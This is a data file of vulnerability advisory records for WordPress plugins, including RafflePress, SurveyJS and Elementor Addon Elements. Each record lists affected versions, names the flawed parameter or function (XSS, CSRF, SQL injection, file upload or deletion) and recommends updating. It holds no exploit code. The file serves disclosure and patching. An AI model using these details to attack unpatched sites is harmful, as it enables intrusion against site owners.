{"CVE_ID":"CVE-2023-5381","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.7","versionEndExcluding":"1.12.8","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.12.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.12.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd2bc2e7-960e-40db-9dcc-a6a60117bd83?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd2bc2e7-960e-40db-9dcc-a6a60117bd83?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4723","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.7","versionEndExcluding":"1.12.8","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.12.7 via the ajax_eae_post_data function. This can allow unauthenticated attackers to extract sensitive data including post\/page ids and titles, including those with pending\/draft\/future\/private status.","recommendation":"Update to version 1.12.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89489218-263f-4157-a5cd-a12bc6a0dfe6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89489218-263f-4157-a5cd-a12bc6a0dfe6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/classes\\\/helper.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/classes\\\/helper.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4690","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.7","versionEndExcluding":"1.12.8","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.12.7. This is due to missing or incorrect nonce validation on the eae_save_config function. This makes it possible for unauthenticated attackers to change configuration settings for the plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.12.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd53b4e1-c6b7-4111-911a-04b14c7a9c4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd53b4e1-c6b7-4111-911a-04b14c7a9c4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4689","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.7","versionEndExcluding":"1.12.8","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.12.7. This is due to missing or incorrect nonce validation on the eae_save_elements function. This makes it possible for unauthenticated attackers to enable\/disable elementor addon elements via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.12.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/472cdbc4-3bfa-4254-b35a-be7ae10782e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/472cdbc4-3bfa-4254-b35a-be7ae10782e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1935","slug":"rafflepress","versionImpact":"1.12.5","versionEndExcluding":"1.12.7","description":"The Giveaways and Contests by RafflePress \u2013 Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018parent_url\u2019 parameter in all versions up to, and including, 1.12.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.12.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29b471ac-3a08-42da-9907-670c3b3bae92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29b471ac-3a08-42da-9907-670c3b3bae92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.12.5\\\/resources\\\/views\\\/rafflepress-giveaway.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.12.5\\\/resources\\\/views\\\/rafflepress-giveaway.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/rafflepress\\\/tags\\\/1.12.5&old=3043286&new_path=\\\/rafflepress\\\/tags\\\/1.12.7&new=3043286&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/rafflepress\\\/tags\\\/1.12.5&old=3043286&new_path=\\\/rafflepress\\\/tags\\\/1.12.7&new=3043286&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2744","slug":"erp","versionEndExcluding":"1.12.4","description":"The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the `type` parameter in the `erp\/v1\/accounting\/v1\/people` REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","recommendation":"Update to version 1.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/435da8a1-9955-46d7-a508-b5738259e731\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/435da8a1-9955-46d7-a508-b5738259e731\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2743","slug":"erp","versionEndExcluding":"1.12.4","description":"The ERP WordPress plugin before 1.12.4 does not sanitise and escape the employee_name parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/517c6aa4-a56d-4f13-b370-7c864dd9c7db\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/517c6aa4-a56d-4f13-b370-7c864dd9c7db\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50427","slug":"surveyjs","versionImpact":"1.9.136","versionEndExcluding":"1.12.4","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Devsoft Baltic O\u00dc SurveyJS: Drag & Drop WordPress Form Builder. This issue affects SurveyJS: Drag & Drop WordPress Form Builder: from n\/a through 1.9.136.","recommendation":"Update to version 1.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/surveyjs\\\/wordpress-surveyjs-plugin-1-9-136-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/surveyjs\\\/wordpress-surveyjs-plugin-1-9-136-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3815","slug":"surveyjs","versionImpact":"1.12.32","versionEndExcluding":"1.12.33","description":"The SurveyJS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.12.32 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.12.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/surveyjs\\\/surveyjs-wordpress\",\"name\":\"https:\\\/\\\/github.com\\\/surveyjs\\\/surveyjs-wordpress\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/surveyjs\\\/surveyjs-wordpress\\\/commit\\\/6c332319c82c32d7148f77ed7ee20a9c6a5dc179\",\"name\":\"https:\\\/\\\/github.com\\\/surveyjs\\\/surveyjs-wordpress\\\/commit\\\/6c332319c82c32d7148f77ed7ee20a9c6a5dc179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/surveyjs\\\/trunk\\\/initializer.php#L165\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/surveyjs\\\/trunk\\\/initializer.php#L165\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/surveyjs.io\\\/stay-updated\\\/release-notes\",\"name\":\"https:\\\/\\\/surveyjs.io\\\/stay-updated\\\/release-notes\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4285590-9c2f-4189-8b47-09378d8a2432?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4285590-9c2f-4189-8b47-09378d8a2432?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6565","slug":"iwp-client","versionEndExcluding":"1.12.3.1","description":"The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.12.3 via the multi-call backup option. This makes it possible for unauthenticated attackers to extract sensitive data from a temporary SQL file via repeated GET requests during the limited time window of the backup process.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fdc32a4-adf8-4174-924b-5d0b763d010c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fdc32a4-adf8-4174-924b-5d0b763d010c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007309\\\/iwp-client\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007309\\\/iwp-client\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5049","slug":"rafflepress","versionImpact":"1.12.0","versionEndExcluding":"1.12.2","description":"The Giveaways and Contests by RafflePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rafflepress' and 'rafflepress_gutenberg' shortcode in versions up to, and including, 1.12.0 due to insufficient input sanitization and output escaping on 'giframe' user supplied attribute. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6d663a9-3185-4c36-b9d1-878297965379?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6d663a9-3185-4c36-b9d1-878297965379?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.11.4\\\/app\\\/rafflepress.php#L955\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.11.4\\\/app\\\/rafflepress.php#L955\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2976620\\\/rafflepress#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2976620\\\/rafflepress#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.11.4\\\/app\\\/rafflepress.php#L796\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.11.4\\\/app\\\/rafflepress.php#L796\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12544","slug":"surveyjs","versionImpact":"1.12.17","versionEndExcluding":"1.12.18","description":"The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to arbitrary file deletion due to a missing capability check on the callback function of the SurveyJS_DeleteFile class in all versions up to, and including, 1.12.17. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). This function is still vulnerable to Cross-Site Request Forgery as of 1.12.20.","recommendation":"Update to version 1.12.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214665\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214665\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222216\\\/surveyjs\\\/trunk\\\/ajax_handlers\\\/delete_file.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222216\\\/surveyjs\\\/trunk\\\/ajax_handlers\\\/delete_file.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9404fe4-855e-4eb4-81c4-5246f6e9be0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9404fe4-855e-4eb4-81c4-5246f6e9be0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10107","slug":"rafflepress","versionImpact":"1.12.16","versionEndExcluding":"1.12.17","description":"The Giveaways and Contests by RafflePress  WordPress plugin before 1.12.17 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.12.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83590cad-6bfb-4dc7-b8fd-aecbc66f3c33\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83590cad-6bfb-4dc7-b8fd-aecbc66f3c33\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6887","slug":"rafflepress","versionImpact":"1.12.16","versionEndExcluding":"1.12.17","description":"The Giveaways and Contests by RafflePress  WordPress plugin before 1.12.16 does not sanitise and escape some of its Giveaways settings, which could allow high privilege users such as editor and above to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.12.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/553806f4-da20-433c-8c19-35e6c87ccade\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/553806f4-da20-433c-8c19-35e6c87ccade\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3963","slug":"rafflepress","versionImpact":"1.12.13","versionEndExcluding":"1.12.14","description":"The Giveaways and Contests by RafflePress  WordPress plugin before 1.12.14 does not sanitise and escape some parameters, which could allow users with a role as low as editor to perform Cross-Site Scripting attacks","recommendation":"Update to version 1.12.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/827d738e-5369-431e-8438-b5c4d8c1f8f1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/827d738e-5369-431e-8438-b5c4d8c1f8f1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0834","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.11","versionEndExcluding":"1.12.12","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link_to parameter in all versions up to, and including, 1.12.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.12.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/price-table\\\/widgets\\\/price-table.php#L784\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/price-table\\\/widgets\\\/price-table.php#L784\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2916","slug":"iwp-client","versionEndExcluding":"1.12.1","description":"The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iwp-client\\\/tags\\\/1.11.1\\\/core.class.php#L365\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iwp-client\\\/tags\\\/1.11.1\\\/core.class.php#L365\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925897\\\/iwp-client#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925897\\\/iwp-client#file4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa157c80-447f-4406-9e49-9cc6208b7b19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa157c80-447f-4406-9e49-9cc6208b7b19?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13359","slug":"product-input-fields-for-woocommerce","versionImpact":"1.12.0","versionEndExcluding":"1.12.1","description":"The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the add_product_input_fields_to_order_item_meta() function in all versions up to, and including, 1.12.1. This may make it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Please note that by default the plugin is only vulnerable to a double extension file upload attack, unless an administrators leaves the accepted file extensions field blank which can make .php file uploads possible.","recommendation":"Update to version 1.12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-input-fields-for-woocommerce\\\/tags\\\/-1.8.2\\\/includes\\\/class-alg-wc-pif-main.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-input-fields-for-woocommerce\\\/tags\\\/-1.8.2\\\/includes\\\/class-alg-wc-pif-main.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234567%40product-input-fields-for-woocommerce&new=3234567%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234567%40product-input-fields-for-woocommerce&new=3234567%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3250201%40product-input-fields-for-woocommerce&new=3250201%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3250201%40product-input-fields-for-woocommerce&new=3250201%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9c08f2e-bffd-40a6-89f3-559cb34f4395?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9c08f2e-bffd-40a6-89f3-559cb34f4395?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9357","slug":"xili-tidy-tags","versionImpact":"1.12.04","versionEndExcluding":"1.12.05","description":"The xili-tidy-tags plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'action' parameter in all versions up to, and including, 1.12.04 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.12.05, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28fd9f64-4451-46fd-bdeb-cc5a538ea563?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28fd9f64-4451-46fd-bdeb-cc5a538ea563?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xili-tidy-tags\\\/tags\\\/1.12.04\\\/xili-includes\\\/class-xili-tidy-tags-admin.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xili-tidy-tags\\\/tags\\\/1.12.04\\\/xili-includes\\\/class-xili-tidy-tags-admin.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/xili-tidy-tags\\\/tags\\\/1.12.04&new_path=\\\/xili-tidy-tags\\\/tags\\\/1.12.05&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/xili-tidy-tags\\\/tags\\\/1.12.04&new_path=\\\/xili-tidy-tags\\\/tags\\\/1.12.05&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11299","slug":"memberpress","versionImpact":"1.11.37","versionEndExcluding":"1.12.0","description":"The Memberpress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.11.37 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 1.12.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/memberpress.com\\\/change-log\\\/#1.12.0\",\"name\":\"https:\\\/\\\/memberpress.com\\\/change-log\\\/#1.12.0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/787cd2bb-489f-471a-82e0-073b4766b45a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/787cd2bb-489f-471a-82e0-073b4766b45a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11362","slug":"peachpay-for-woocommerce","versionImpact":"1.112.0","versionEndExcluding":"1.113.0","description":"The Payments Plugin and Checkout Plugin for WooCommerce: Stripe, PayPal, Square, Authorize.net plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.112.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.113.0, or a newer patched 